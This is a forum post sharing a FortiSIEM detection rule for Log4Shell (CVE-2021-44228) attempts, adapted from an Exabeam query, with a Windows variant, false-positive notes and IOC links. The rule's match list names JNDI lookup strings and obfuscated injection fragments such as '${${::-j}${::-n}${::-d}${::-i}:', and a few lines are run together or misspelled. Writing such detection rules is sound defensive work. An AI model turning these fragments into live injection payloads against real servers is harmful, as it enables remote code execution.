Hello there,
The following rules was created and adapted from an Exabeam query. See original post below.
https://community.exabeam.com/s/article/Detecting-CVE-2021-44228-Log4j2-using-ExabeamEvent type != FortiGate-ips-signature-51006 [we do not want to include any event reported by FortiGate, just events reported by servers]
AND
(
Raw Event Log CONTAIN jndi:ldap
OR
Raw Event Log CONTAIN jndi:dns
orORRaw Event Log CONTAIN jndi:ldaps
OR
Raw Event Log CONTAIN jndi:rmi
OR
Raw Event Log CONTAIN j}ndi
OR
Raw Event Log CONTAIN jndi%3Aldap
OR
Raw Event Log CONTAIN jndi%3Aldns
OR
Raw Event Log CONTAIN ${jndi:ldap:
OR
Raw Event Log CONTAIN ${${::-j}${::-n}${::-d}${::-i}:
OR
Raw Event Log CONTAIN ${${::-j}ndi:\" OR \"${${lower:jndi}
)
The reason why we are using Raw Event Log is because FortiSIEM is not parsing all WMI application Widows events. It is required to modify the parser to capture this information.
An alternative Rule specific for Windows devices could be:
Event type = Win-App-ASP.NET-4.0.30319.0-1309
Raw Event Log CONTAIN jndi:ldap
---------------------
False positives:
--------------------
The server
Log4j 2 library version is not within this range
2.0-beta9 to 2.14.1.
You need to either verify manually on the server(s) or perform some sort vulnerability scan. IOCs:
https://securityblue.team/log4j-hunting-and-indicators/https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv I hope it helps
